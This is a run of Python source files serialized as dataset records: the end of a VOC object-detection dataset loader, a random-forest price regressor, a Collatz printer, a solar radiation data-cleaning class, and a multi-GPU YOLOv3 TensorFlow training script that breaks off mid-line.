:param filenames:\n :param data_root:\n :param anno_dir:\n :param image_dir:\n :param class_names:\n :param transform:\n :param color_space:\n :param keep_difficult:\n :param shuffle:\n :param check:\n :return:\n \"\"\"\n if not isinstance(filenames, list) and os.path.isfile(filenames):\n filenames = [filenames]\n datas = []\n for filename in filenames:\n data = VOCDataset(filename=filename,\n data_root=data_root,\n anno_dir=anno_dir,\n image_dir=image_dir,\n class_names=class_names,\n transform=transform,\n color_space=color_space,\n keep_difficult=keep_difficult,\n shuffle=shuffle,\n check=check)\n datas.append(data)\n voc = ConcatDataset(datas, shuffle=shuffle)\n return voc\n\n\ndef show_boxes_image(image, bboxes, labels, normal=False, transpose=False):\n \"\"\"\n :param image:\n :param targets_t:\n bboxes = targets[idx][:, :4].data\n keypoints = targets[idx][:, 4:14].data\n labels = targets[idx][:, -1].data\n :return:\n \"\"\"\n import numpy as np\n from utils import image_processing\n image = np.asarray(image)\n bboxes = np.asarray(bboxes)\n labels = np.asarray(labels)\n print(\"image:{}\".format(image.shape))\n print(\"bboxes:{}\".format(bboxes))\n print(\"labels:{}\".format(labels))\n if transpose:\n image = image_processing.untranspose(image)\n h, w, _ = image.shape\n landms_scale = np.asarray([w, h] * 5)\n bboxes_scale = np.asarray([w, h] * 2)\n if normal:\n bboxes = bboxes * bboxes_scale\n # tmp_image = image_processing.untranspose(tmp_image)\n image = image_processing.draw_image_bboxes_text(image, bboxes, labels)\n image_processing.cv_show_image(\"image\", image, waitKey=0)\n print(\"===\" * 10)\n\n\nif __name__ == \"__main__\":\n from utils import 
image_processing, file_processing\n from models.transforms import data_transforms\n\n # from models.transforms import data_transforms\n\n isshow = True\n # data_root = \"/home/dm/panjinquan3/dataset/MPII/\"\n # data_root = \"/media/dm/dm2/git/python-learning-notes/dataset/Test_Voc\"\n # anno_dir = '/home/dm/panjinquan3/dataset/finger/finger/Annotations'\n # image_dir = '/home/dm/panjinquan3/dataset/finger/finger/JPEGImages'\n # data_root = \"/home/dm/panjinquan3/dataset/Character/gimage_v1/\"\n # data_root = \"/home/dm/panjinquan3/dataset/finger/finger_v5/\"\n # data_root = '/home/dm/panjinquan3/dataset/Character/gimage_v1/'\n # data_root = \"/home/dm/data3/dataset/face_person/SMTC/\"\n # data_root = \"/home/dm/data3/dataset/face_person/MPII/\"\n # data_root = \"/home/dm/data3/dataset/face_person/COCO/VOC/\"\n data_root = \"/home/dm/data3/dataset/card_datasets/yolo_det/CardData4det/\"\n image_dir = data_root + \"JPEGImages\"\n anno_dir = data_root + \"Annotations\"\n filenames = data_root + \"trainval.txt\"\n # class_names = [\"face\", \"person\"]\n # class_names = [\"person\"]\n class_names = [\"card\",\"1\"]\n # class_names = [\"1\"]\n # anno_dir = data_root + '/Annotations'\n shuffle = False\n # class_names = [\"face\", \"person\"]\n # class_names = None\n # class_names = {\"circle\": 0, \"hook\": 1, \"slash\": 2, \"underline\": 3}\n # anno_list = file_processing.get_files_list(anno_dir, postfix=[\"*.xml\"])\n # image_id_list = file_processing.get_files_id(anno_list)\n size = [480, 480]\n # transform = data_transforms.TrainAugmentation(size, mean=0.0, std=1.0)\n # transform = data_transforms.TrainTransform(size, mean=0.0, std=1.0, norm=True)\n # transform = data_transforms.DemoTransform(size, mean=0.0, std=1.0, norm=True)\n transform = data_transforms.TrainTransform(size, mean=0.0, std=1.0, norm=True)\n voc = VOCDataset(filename=filenames,\n data_root=None,\n anno_dir=anno_dir,\n image_dir=image_dir,\n class_names=class_names,\n transform=transform,\n check=True)\n voc = ConcatDataset([voc, voc])\n # voc = torch_utils.ConcatDataset([voc, voc])\n print(\"have num:{}\".format(len(voc)))\n for i in range(len(voc)):\n print(i)\n image, target = voc.__getitem__(i)\n bboxes, labels = target[:, 0:4], target[:, 4:5]\n show_boxes_image(image, bboxes, labels, normal=True, transpose=True)\n","sub_path":"models/dataloader/parser_voc.py","file_name":"parser_voc.py","file_ext":"py","file_size_in_byte":20391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"101114862","text":"#!/usr/bin/env python \n\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn import preprocessing\n\ndata = pd.read_csv(\"clean_data.csv\",sep=\",\",index_col=None, prefix=None,skip_blank_lines=True,header=0)\n\nX = data.loc[:,[\"Quartier\",\"Commune\",\"Etage\",\"Superficie\",\"Piece\",\"Electricite\" , \"Gaz\" , \"Eau\" , \"Acte notarie\",\"Jardin\" , \"Livret foncier\", \"Meuble\", \"Garage\"]].values\nY = data.loc[:,\"Prix\"].values\n\nX = pd.DataFrame(X)\n\n\nle = preprocessing.LabelEncoder()\nX = X.apply(le.fit_transform)\n\n\nX_train,X_test,Y_train,Y_test = train_test_split(X,Y,test_size=0.2)\n\nregressor = RandomForestRegressor(max_depth=4, random_state=0)\nregressor.fit(X_train,Y_train)\nscore = 
regressor.score(X_test,Y_test)\nprint(score)","sub_path":"Regressors/RandomForestRegressor.py","file_name":"RandomForestRegressor.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"160735318","text":"def collatz(n):\n res = [n]\n num = n\n while num > 1:\n num = (num // 2) if num % 2 == 0 else (3 * num + 1)\n res.append(num) \n return res\n\ndef chain_printer(li):\n print(' -> '.join(str(x) for x in li))\n\nchain_printer(collatz(int(input())))\n","sub_path":"problems-1/a-ushaev/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"240674561","text":"# -*- coding: utf-8 -*-\n\"\"\"\n# **********************************************************************************************************************\n# @file lss_cleaning.py\n# @author edward chen\n# @version v 2.0.0\n# @date 2019-01-07\n# @brief\n# **********************************************************************************************************************\n# @attention\n\n# **********************************************************************************************************************\n\"\"\"\n\n'''\n# ======================================================================================================================\n# Import\n# ======================================================================================================================\n'''\nimport datetime as dt\nimport pandas as pd\nimport astral\n\n\n'''\n# ======================================================================================================================\n# User\n# ======================================================================================================================\n'''\n\n'''\n# ======================================================================================================================\n# Variable\n# ======================================================================================================================\n'''\n\n\n'''\n# ======================================================================================================================\n# Class\n# ======================================================================================================================\n'''\nclass Cleaning(object):\n \n \n D_STATION_INFO = {\n \"hami\": {\n \"name\": \"hami\",\n \"latitude\": 42.81855,\n \"longitude\": 93.51538, \n \"timezone\": \"Asia/Harbin\"\n },\n \"daqing\": {\n \"name\": \"daqing\",\n \"latitude\": 46.58758,\n \"longitude\": 125.10307, \n \"timezone\": \"Asia/Harbin\" \n },\n \"pucheng\": {\n \"name\": \"pucheng\",\n \"latitude\": 34.34127,\n \"longitude\": 108.93984, \n \"timezone\": \"Asia/Harbin\" \n } \n } \n\n def __init__(self, path_output):\n self.path_output = path_output\n\n def calc_sunrise_sunset(self, db_name, DT_date):\n db_name = db_name.split('_')[-1]\n location = astral.Location()\n location.name = self.D_STATION_INFO[db_name][\"name\"]\n location.latitude = self.D_STATION_INFO[db_name][\"latitude\"]\n location.longitude = self.D_STATION_INFO[db_name][\"longitude\"]\n location.timezone = self.D_STATION_INFO[db_name][\"timezone\"]\n \n DT_sunrise = location.sun(DT_date)[\"sunrise\"]\n DT_sunset = location.sun(DT_date)[\"sunset\"]\n \n DT_sunrise = dt.datetime.combine(DT_sunrise.date(), DT_sunrise.time())\n DT_sunset = dt.datetime.combine(DT_sunset.date(), 
DT_sunset.time())\n \n return DT_sunrise, DT_sunset\n \n def get_meteo_data_from_csv(self, path_input, csv_file):\n PD_D_fd = pd.read_csv(path_input + csv_file, index_col = \"DateTime\")\n \n return PD_D_fd\n \n def app_meteo_data_cleaning(self, db_name, PD_D_meteo_data, noisy_threshold=10, threshold=1, save_csv=False):\n # get meteo data\n PD_D_meteo_fd = PD_D_meteo_data.copy().fillna(0)\n \n DT_1_minute = dt.timedelta(minutes=1) \n station_name = db_name.split('_')[-1]\n \n if \"meteo_01__direct_radiation\" in PD_D_meteo_fd.columns:\n del PD_D_meteo_fd[\"meteo_01__direct_radiation\"]\n if \"meteo_01__scattered_radiation\" in PD_D_meteo_fd.columns:\n del PD_D_meteo_fd[\"meteo_01__scattered_radiation\"]\n #\n PD_D_meteo_fd = PD_D_meteo_fd - noisy_threshold\n \n PD_D_meteo_fd[PD_D_meteo_fd.values < 0] = 0 \n # \n PD_D_meteo_fd.index = pd.to_datetime(PD_D_meteo_fd.index)\n DT_start_date = PD_D_meteo_fd.index[0].date()\n DT_end_date = PD_D_meteo_fd.index[-1].date()\n year = str(DT_start_date.year).zfill(4)\n month = str(DT_start_date.month).zfill(2)\n\n D_rad_daily_src = {}\n D_rad_daily_proc = {} \n D_sun_info = {}\n for i in range((DT_end_date - DT_start_date).days + 1):\n # get current date\n DT_current_date = DT_start_date + dt.timedelta(i)\n current_date = dt.date.strftime(DT_current_date, \"%Y-%m-%d\")\n DT_start_datetime = PD_D_meteo_fd[current_date].index[0]\n DT_end_datetime = PD_D_meteo_fd[current_date].index[-1]\n # calculate the sunrise time and sunset time\n DT_sunrise, DT_sunset = self.calc_sunrise_sunset(db_name, DT_current_date) \n DT_sunrise = DT_sunrise.replace(second=0) \n DT_sunset = DT_sunset.replace(second=0) \n D_sun_info[DT_current_date] = {\"sunrise\": DT_sunrise.time(), \"sunset\": DT_sunset.time()}\n # \n PD_D_meteo_fd.loc[DT_start_datetime:(DT_sunrise-DT_1_minute)] = 0\n PD_D_meteo_fd.loc[(DT_sunset+DT_1_minute):DT_end_datetime] = 0\n #\n D_rad_daily_src[current_date] = PD_D_meteo_fd[current_date].sum()\n #\n for DT_datetime in PD_D_meteo_fd.loc[(DT_sunrise+DT_1_minute):(DT_sunset-DT_1_minute)].index:\n if int(PD_D_meteo_fd.loc[DT_datetime]) == 0:\n DT_datetime_before = DT_datetime - DT_1_minute\n DT_datetime_after = DT_datetime + DT_1_minute\n PD_D_meteo_fd.loc[DT_datetime] = (\n PD_D_meteo_fd.loc[DT_datetime_before] + \n PD_D_meteo_fd.loc[DT_datetime_after]\n )/2\n # \n D_rad_daily_proc[current_date] = PD_D_meteo_fd[current_date].sum()\n \n PD_D_rad_daily_src = pd.DataFrame(D_rad_daily_src).T\n PD_D_rad_daily_proc = pd.DataFrame(D_rad_daily_proc).T\n\n # \n PD_D_meteo_fd[PD_D_meteo_fd.values <= threshold] = 0\n #\n PD_D_sun_info = pd.DataFrame(D_sun_info).T\n \n PD_D_meteo_for_simulation = PD_D_meteo_fd.copy()\n PD_D_meteo_for_simulation[\"Date\"] = PD_D_meteo_for_simulation.index.date\n PD_D_meteo_for_simulation[\"Time\"] = PD_D_meteo_for_simulation.index.time\n if station_name == \"pucheng\":\n L_colunms = [\"Date\", \"Time\", \"meteo_01__radiation_10\"]\n L_colunms_cn = {\"Date\": \"日期\", \"Time\": \"时间\", \"meteo_01__radiation_10\": \"水平辐射\"}\n else:\n L_colunms = [\"Date\", \"Time\", \"meteo_01__radiation_01\"]\n L_colunms_cn = {\"Date\": \"日期\", \"Time\": \"时间\", \"meteo_01__radiation_01\": \"水平辐射\"}\n \n PD_D_meteo_for_simulation = PD_D_meteo_for_simulation[L_colunms]\n PD_D_meteo_for_simulation.rename(columns = L_colunms_cn, inplace=True)\n\n if save_csv is True:\n PD_D_meteo_fd.to_csv(\n self.path_output + \n '_'.join([db_name, year, month, \"_radiation_after_cleaning.csv\"])\n ) \n PD_D_meteo_for_simulation.to_csv(\n self.path_output + \n 
'_'.join([db_name, year, month, \"_radiation_for_simulation.csv\"]), \n index=False,\n encoding=\"gb2312\"\n )\n PD_D_sun_info.to_csv(\n self.path_output + \n '_'.join([db_name, year, month, \"_sun_info.csv\"])\n ) \n PD_D_rad_daily_src.to_csv(\n self.path_output + \n '_'.join([db_name, year, month, \"_rad_mean_src.csv\"]) \n )\n PD_D_rad_daily_proc.to_csv(\n self.path_output + \n '_'.join([db_name, year, month, \"_rad_mean_proc.csv\"]) \n ) \n\n T_meteo_cleaning_info = (\n PD_D_sun_info, \n PD_D_meteo_for_simulation, \n PD_D_rad_daily_src, \n PD_D_rad_daily_proc\n ) \n return PD_D_meteo_fd, T_meteo_cleaning_info\n \n\n \n \n \n\n'''\n# ======================================================================================================================\n# Function\n# ======================================================================================================================\n'''\n\n\n\n'''\n# ======================================================================================================================\n# Relational Function\n# ======================================================================================================================\n'''\n\n\n'''\n# ======================================================================================================================\n# Application\n# ======================================================================================================================\n'''\n\nif __name__ == '__main__':\n \n output_path = \"C:/Users/chen/Desktop/\"\n db_name = \"test_daqing\"\n \n myapp = Cleaning(output_path)\n fd = myapp.get_meteo_data_from_csv(output_path, \"daqing_2018_10__radiation_min_src.csv\") \n PD_D_meteo_fd, T_meteo_cleaning_info = myapp.app_meteo_data_cleaning(\"test_daqing\", fd, save_csv=True)\n \n \n \n \n\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n \n \n \n\n","sub_path":"monthly_report_(old)/lss_cleaning.py","file_name":"lss_cleaning.py","file_ext":"py","file_size_in_byte":9785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"32572755","text":"# coding: utf-8\n\nfrom __future__ import division, print_function\n\nimport tensorflow as tf\nimport numpy as np\nimport logging\nfrom tqdm import trange\nimport tensorflow.contrib.slim as slim\nimport os\n# os.environ['TF_AUTO_MIXED_PRECISION_GRAPH_REWRITE_IGNORE_PERFORMANCE'] = '1'\nos.environ['CUDA_VISIBLE_DEVICES']='0,1'\n# import args\nfrom utils.data_utils import get_batch_data\nfrom utils.misc_utils import shuffle_and_overwrite, make_summary, config_learning_rate, config_optimizer, AverageMeter\nfrom utils.eval_utils import evaluate_on_cpu, evaluate_on_gpu, get_preds_gpu, voc_eval, parse_gt_rec\nfrom utils.nms_utils import gpu_nms\n\nfrom model import yolov3\nimport mutili_gpu_args as args\ndef average_gradients(tower_grads):\n \"\"\"Calculate the average gradient for each shared variable across all towers.\n Note that this function provides a synchronization point across all towers.\n Args:\n tower_grads: List of lists of (gradient, variable) tuples. The outer list\n is over individual gradients. The inner list is over the gradient\n calculation for each tower.\n Returns:\n List of pairs of (gradient, variable) where the gradient has been averaged\n across all towers.\n \"\"\"\n average_grads = []\n for grad_and_vars in zip(*tower_grads):\n # Note that each grad_and_vars looks like the following:\n # ((grad0_gpu0, var0_gpu0), ... 
, (grad0_gpuN, var0_gpuN))\n grads = []\n for g, _ in grad_and_vars:\n # Add 0 dimension to the gradients to represent the tower.\n expanded_g = tf.expand_dims(g, 0)\n\n # Append on a 'tower' dimension which we will average over below.\n grads.append(expanded_g)\n\n # Average over the 'tower' dimension.\n grad = tf.concat(axis=0, values=grads)\n grad = tf.reduce_mean(grad, 0)\n\n # Keep in mind that the Variables are redundant because they are shared\n # across towers. So .. we will just return the first tower's pointer to\n # the Variable.\n v = grad_and_vars[0][1]\n grad_and_var = (grad, v)\n average_grads.append(grad_and_var)\n return average_grads\n\n\ndef sum_gradients(tower_grads):\n \"\"\"Calculate the average gradient for each shared variable across all towers.\n Note that this function provides a synchronization point across all towers.\n Args:\n tower_grads: List of lists of (gradient, variable) tuples. The outer list\n is over individual gradients. The inner list is over the gradient\n calculation for each tower.\n Returns:\n List of pairs of (gradient, variable) where the gradient has been averaged\n across all towers.\n \"\"\"\n sum_grads = []\n for grad_and_vars in zip(*tower_grads):\n # Note that each grad_and_vars looks like the following:\n # ((grad0_gpu0, var0_gpu0), ... , (grad0_gpuN, var0_gpuN))\n grads = []\n for g, _ in grad_and_vars:\n # Add 0 dimension to the gradients to represent the tower.\n expanded_g = tf.expand_dims(g, 0)\n\n # Append on a 'tower' dimension which we will average over below.\n grads.append(expanded_g)\n\n # Average over the 'tower' dimension.\n grad = tf.concat(axis=0, values=grads)\n grad = tf.reduce_sum(grad, 0)\n\n # Keep in mind that the Variables are redundant because they are shared\n # across towers. So .. 
we will just return the first tower's pointer to\n # the Variable.\n v = grad_and_vars[0][1]\n grad_and_var = (grad, v)\n sum_grads.append(grad_and_var)\n return sum_grads\n\ndef get_restorer():\n checkpoint_path = args.restore_path\n print(\"model restore from pretrained mode, path is :\", checkpoint_path)\n\n model_variables = slim.get_model_variables()\n for var in model_variables:\n print(var.name)\n print(20*\"__++__++__\")\n\n def name_in_ckpt(var):\n return var.op.name\n\n nameInCkpt_Var_dict = {}\n for var in model_variables:\n if \"Momentum\" not in var.name:\n for exclude_var in args.restore_exclude:\n if exclude_var not in var.name:\n var_name_in_ckpt = name_in_ckpt(var)\n nameInCkpt_Var_dict[var_name_in_ckpt] = var\n restore_variables = nameInCkpt_Var_dict\n for key, item in restore_variables.items():\n print(\"var_in_graph: \", item.name)\n print(\"var_in_ckpt: \", key)\n print(20*\"___\")\n restorer = tf.train.Saver(restore_variables)\n print(20 * \"****\")\n print(\"restore from pretrained_weighs in IMAGE_NET\")\n return restorer, checkpoint_path\n\ndef print_info(image):\n # print(\"all batch img-ids is\", image)\n return 0\n\n# setting loggers\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s',\n datefmt='%a, %d %b %Y %H:%M:%S', filename=args.progress_log_path, filemode='w')\n\n# setting placeholders\nis_training = tf.placeholder(tf.bool, name=\"phase_train\")\nhandle_flag = tf.placeholder(tf.string, [], name='iterator_handle_flag')\n# register the gpu nms operation here for the following evaluation scheme\npred_boxes_flag = tf.placeholder(tf.float32, [1, None, None])\npred_scores_flag = tf.placeholder(tf.float32, [1, None, None])\ngpu_nms_op = gpu_nms(pred_boxes_flag, pred_scores_flag, args.class_num, args.nms_topk, args.score_threshold, args.nms_threshold)\n\n##################\n# tf.data pipeline\n##################\n######################## batchsize use 1 will cause gpu1 cannot allocate data, so 1 -> 2 ###########################\n# if args.batch_size == 1:\n# args.batch_size == 2\ntrain_dataset = tf.data.TextLineDataset(args.train_file)\ntrain_dataset = train_dataset.shuffle(args.train_img_cnt)\ntrain_dataset = train_dataset.batch(args.batch_size)\ntrain_dataset = train_dataset.map(\n lambda x: tf.py_func(get_batch_data,\n inp=[x, args.class_num, args.img_size, args.anchors, 'train', args.multi_scale_train, args.use_mix_up, args.letterbox_resize],\n Tout=[tf.int64, tf.float32, tf.float32, tf.float32, tf.float32]),\n num_parallel_calls=args.num_threads\n)\ntrain_dataset = train_dataset.prefetch(args.prefetech_buffer)\n\nval_dataset = tf.data.TextLineDataset(args.val_file)\nval_dataset = val_dataset.batch(1)\n# val_dataset = val_dataset.batch(args.batch_size)\nval_dataset = val_dataset.map(\n lambda x: tf.py_func(get_batch_data,\n inp=[x, args.class_num, args.img_size, args.anchors, 'val', False, False, args.letterbox_resize],\n Tout=[tf.int64, tf.float32, tf.float32, tf.float32, tf.float32]),\n num_parallel_calls=args.num_threads\n)\nval_dataset.prefetch(args.prefetech_buffer)\n\niterator = tf.data.Iterator.from_structure(train_dataset.output_types, train_dataset.output_shapes)\ntrain_init_op = iterator.make_initializer(train_dataset)\nval_init_op = iterator.make_initializer(val_dataset)\n\n# get an element from the chosen dataset iterator\nimage_ids, image, y_true_13, y_true_26, y_true_52 = iterator.get_next()\ny_true = [y_true_13, y_true_26, y_true_52]\n\n# img_name_batch, img_batch, gtboxes_and_label_batch, num_objects_batch, 
img_h_batch, img_w_batch = \\\ninputs_list = []\ny_true_batch= []\nimage_ids_batch = []\nimage_batch = []\nfor i in range(args.NUM_GPU):\n start = i*(args.batch_size//args.NUM_GPU)\n end = (i+1)*(args.batch_size//args.NUM_GPU)\n\n img = image[start:end, :, :, :]\n id_img = image_ids[start:end]\n\n\n y_true_13_batch = y_true_13[start:end, :, :]\n y_true_26_batch = y_true_26[start:end, :, :]\n y_true_52_batch = y_true_52[start:end, :, :]\n imag_info = tf.py_func(print_info, inp=[y_true_13_batch], Tout=[tf.int64])\n\n y_true_batch.append([y_true_13_batch, y_true_26_batch, y_true_52_batch])\n image_batch.append(img)\n image_ids_batch.append(id_img)\n\n image_ids_batch[i].set_shape([None])\n image_batch[i].set_shape([None, None, None, 3])\n for y in y_true_batch[i]:\n y.set_shape([None, None, None, None, None])\n\n\n# with tf.Session() as sess:\n# sess.run([tf.global_variables_initializer(), tf.local_variables_initializer()])\n# for epoch in range(args.total_epoches):\n# sess.run(train_init_op)\n# for i in trange(args.train_batch_num ):\n# # for i in trange(1):\n# a, b, c, d= sess.run(\n# [image_ids_batch, image_batch, y_true_batch, imag_info] )\n# print('img_id id bantch is', a)\n# print('y_ture_batch is', y_true_batch)\n# print(\"one epoch is finished \")\n# print(\"one epoch is finished \")\n# print(\"one epoch is finished \")\n# print(\"one epoch is finished \")\n # print('e is', e)\n # print('gpu0 y_true batch is', c)\n # print('gpu1 y_true batch is', d)\n\n\nwith tf.device('/cpu:0'):\n tower_grads = []\n y_pred = []\n loss_gpus = []\n yolo_model = yolov3(args.class_num, args.anchors, args.use_label_smooth, args.use_focal_loss, args.batch_norm_decay, args.weight_decay, use_static_shape=False)\n global_step = tf.Variable(float(args.global_step), trainable=False, collections=[tf.GraphKeys.LOCAL_VARIABLES])\n with tf.variable_scope(tf.get_variable_scope()):\n for i in range(args.NUM_GPU):\n print(\"current gpu is\", i)\n with tf.device('/gpu:%d' % i):\n image_gpu_true = image_batch[i]\n y_gpu_true = y_true_batch[i]\n with tf.variable_scope('yolov3'):\n pred_feature_maps = yolo_model.forward(image_gpu_true, is_training=is_training)\n print(\"featuremap shape is\", pred_feature_maps)\n loss = yolo_model.compute_loss(pred_feature_maps, y_gpu_true)\n y_pred_net = yolo_model.predict(pred_feature_maps)\n loss_gpus.append(loss)\n y_pred.append(y_pred_net)\n\n l2_loss = tf.losses.get_regularization_loss() #[total_loss, loss_xy, loss_wh, loss_conf, loss_class]\n if args.use_warm_up:\n learning_rate = tf.cond(tf.less(global_step, args.train_batch_num * args.warm_up_epoch),\n lambda: args.learning_rate_init * global_step / (\n args.train_batch_num * args.warm_up_epoch),\n lambda: config_learning_rate(args,\n global_step - args.train_batch_num * args.warm_up_epoch))\n else:\n learning_rate = config_learning_rate(args, global_step)\n tf.summary.scalar('learning_rate', learning_rate)\n if not args.save_optimizer:\n saver_to_save = tf.train.Saver()\n saver_best = tf.train.Saver()\n optimizer = config_optimizer(args.optimizer_name, learning_rate)\n saver_to_restore = tf.train.Saver(var_list=tf.contrib.framework.get_variables_to_restore(include=args.restore_include, exclude=args.restore_exclude))\n update_vars = tf.contrib.framework.get_variables_to_restore(include=args.update_part)\n\n tf.summary.scalar('train_batch_statistics/total_loss', loss[0])\n tf.summary.scalar('train_batch_statistics/loss_xy', loss[1])\n tf.summary.scalar('train_batch_statistics/loss_wh', loss[2])\n 
tf.summary.scalar('train_batch_statistics/loss_conf', loss[3])\n tf.summary.scalar('train_batch_statistics/loss_class', loss[4])\n tf.summary.scalar('train_batch_statistics/loss_l2', l2_loss)\n tf.summary.scalar('train_batch_statistics/loss_ratio', l2_loss / loss[0])\n\n # set dependencies for BN ops\n total_losses = 0.0\n total_losses += loss[0]\n total_losses = total_losses / args.NUM_GPU\n if i == args.NUM_GPU - 1:\n l2_loss = tf.losses.get_regularization_loss()\n total_losses = total_losses + l2_loss\n # l2_loss = tf.losses.get_regularization_loss()\n # total_losses = total_losses + l2_loss\n tf.get_variable_scope().reuse_variables()\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n # gvs = optimizer.compute_gradients(loss[0] + l2_loss, var_list=update_vars)\n # clip_grad_var = [gv if gv[0] is None else [\n # tf.clip_by_norm(gv[0], 100.), gv[1]] for gv in gvs]\n grads = optimizer.compute_gradients(total_losses)\n clip_grad_var = [gv if gv[0] is None else [\n tf.clip_by_norm(gv[0], 100.), gv[1]] for gv in grads]\n tower_grads.append(clip_grad_var)\n\n if len(tower_grads) > 1:\n clip_grad_var = sum_gradients(tower_grads)\n else:\n clip_grad_var = tower_grads[0]\n\n train_op = optimizer.apply_gradients(clip_grad_var, global_step=global_step)\n\n if args.save_optimizer:\n print('Saving optimizer parameters to checkpoint! Remember to restore the global_step in the fine-tuning afterwards.')\n saver_to_save = tf.train.Saver()\n saver_best = tf.train.Saver()\n\n config = tf.ConfigProto(allow_soft_placement=True)\n with tf.Session(config=config) as sess:\n sess.run([tf.global_variables_initializer(), tf.local_variables_initializer()])\n\n saver_to_restore.restore(sess, args.restore_path)\n # restorer, restore_ckpt = get_restorer()\n # restorer.restore(sess, restore_ckpt)\n merged = tf.summary.merge_all()\n writer = tf.summary.FileWriter(args.log_dir, sess.graph)\n\n print('\\n----------- start to train -----------\\n')\n best_mAP = -np.Inf\n\n for epoch in range(args.total_epoches):\n sess.run(train_init_op)\n loss_total, loss_xy, loss_wh, loss_conf, loss_class = AverageMeter(), AverageMeter(), AverageMeter(), AverageMeter(), AverageMeter()\n for i in trange(args.train_batch_num):\n if i <= (args.train_batch_num-2):\n _, summary, __y_pred, __y_true, __loss, __global_step, __lr = sess.run(\n [train_op, merged, y_pred, y_true_batch, loss_gpus, global_step, learning_rate],\n feed_dict={is_training: True})\n writer.add_summary(summary, global_step=__global_step)\n loss_total.update((__loss[0][0] + __loss[1][0] ), len(__y_pred[0][0] + __y_pred[1][0]))\n loss_xy.update((__loss[0][1] + __loss[1][1] ), len(__y_pred[0][0] + __y_pred[1][0]))\n loss_wh.update((__loss[0][2] + __loss[1][2] ), len(__y_pred[0][0] + __y_pred[1][0]))\n loss_conf.update((__loss[0][3] + __loss[1][3] ), len(__y_pred[0][0] + __y_pred[1][0]))\n loss_class.update((__loss[0][4] + __loss[1][4] ), len(__y_pred[0][0] + __y_pred[1][0]))\n\n\n if __global_step % args.train_evaluation_step == 0 and __global_step > 0:\n print(\"loss total is\", loss_total.average)\n # recall, precision = evaluate_on_cpu(__y_pred, __y_true, args.class_num, args.nms_topk, args.score_threshold, args.nms_threshold)\n recall, precision = evaluate_on_gpu(sess, gpu_nms_op, pred_boxes_flag, pred_scores_flag, __y_pred[0], __y_true[0], args.class_num, args.nms_threshold)\n recall_1, precision_1 = evaluate_on_gpu(sess, gpu_nms_op, pred_boxes_flag, pred_scores_flag, __y_pred[1], __y_true[1], args.class_num, 
args.nms_threshold)\n\n recall_muti_gpu = (recall + recall_1)/2.0\n precision_muti_gpu = (precision + precision_1)/2.0\n\n print(\"precision_0, recall_0 is\", precision, recall)\n print(\"precision_1, recall_1 is\", precision_1, recall_1)\n info = \"Epoch: {}, global_step: {} | loss: total: {:.2f}, xy: {:.2f}, wh: {:.2f}, conf: {:.2f}, class: {:.2f} | \".format(\n epoch, int(__global_step), loss_total.average, loss_xy.average, loss_wh.average, loss_conf.average, loss_class.average)\n info += 'Last batch: rec: {:.3f}, prec: {:.3f} | lr: {:.5g}'.format(recall_muti_gpu, precision_muti_gpu, __lr)\n print(info)\n logging.info(info)\n\n writer.add_summary(make_summary('evaluation/train_batch_recall', recall_muti_gpu), global_step=__global_step)\n writer.add_summary(make_summary('evaluation/train_batch_precision', precision_muti_gpu), global_step=__global_step)\n\n if np.isnan(loss_total.average):\n print('****' * 10)\n raise ArithmeticError(\n 'Gradient exploded! Please train again and you may need modify some parameters.')\n\n # NOTE: this is just demo. You can set the conditions when to save the weights.\n if epoch % args.save_epoch == 0 and epoch > 0:\n if loss_total.average <= 2.:\n saver_to_save.save(sess, args.save_dir + 'model-epoch_{}_step_{}_loss_{:.4f}_lr_{:.5g}'.format(epoch, int(__global_step), loss_total.average, __lr))\n\n # switch to validation dataset for evaluation\n if epoch % args.val_evaluation_epoch == 0 and epoch >= args.warm_up_epoch:\n # if epoch % args.val_evaluation_epoch == 0 :\n sess.run(val_init_op)\n val_loss_total, val_loss_xy, val_loss_wh, val_loss_conf, val_loss_class = \\\n AverageMeter(), AverageMeter(), AverageMeter(), AverageMeter(), AverageMeter()\n\n val_preds = []\n\n for j in trange(args.val_img_cnt):\n __image_ids, __y_pred, __loss = sess.run([image_ids_batch[0], y_pred[0], loss_gpus[0]],\n feed_dict={is_training: False})\n\n pred_content = get_preds_gpu(sess, gpu_nms_op, pred_boxes_flag, pred_scores_flag, __image_ids, __y_pred)\n # pred_content = get_preds_gpu(sess, gpu_nms_op, pred_boxes_flag, pred_scores_flag, __image_ids[0], __y_pred[0])\n val_preds.extend(pred_content)\n val_loss_total.update(__loss[0])\n val_loss_xy.update(__loss[1])\n val_loss_wh.update(__loss[2])\n val_loss_conf.update(__loss[3])\n val_loss_class.update(__loss[4])\n\n # calc mAP\n rec_total, prec_total, ap_total = AverageMeter(), AverageMeter(), AverageMeter()\n gt_dict = parse_gt_rec(args.val_file, args.img_size, args.letterbox_resize)\n\n info = '======> Epoch: {}, global_step: {}, lr: {:.6g} <======\\n'.format(epoch, __global_step, __lr)\n\n for ii in range(args.class_num):\n npos, nd, rec, prec, ap = voc_eval(gt_dict, val_preds, ii, iou_thres=args.eval_threshold, use_07_metric=args.use_voc_07_metric)\n info += 'EVAL: Class {}: Recall: {:.4f}, Precision: {:.4f}, AP: {:.4f}\\n'.format(ii, rec, prec, ap)\n rec_total.update(rec, npos)\n prec_total.update(prec, nd)\n ap_total.update(ap, 1)\n\n mAP = ap_total.average\n info += 'EVAL: Recall: {:.4f}, Precison: {:.4f}, mAP: {:.4f}\\n'.format(rec_total.average, prec_total.average, mAP)\n info += 'EVAL: loss: total: {:.2f}, xy: {:.2f}, wh: {:.2f}, conf: {:.2f}, class: {:.2f}\\n'.format(\n val_loss_total.average, val_loss_xy.average, val_loss_wh.average, val_loss_conf.average, val_loss_class.average)\n print(info)\n logging.info(info)\n\n if mAP > best_mAP:\n best_mAP = mAP\n saver_best.save(sess, args.save_dir + 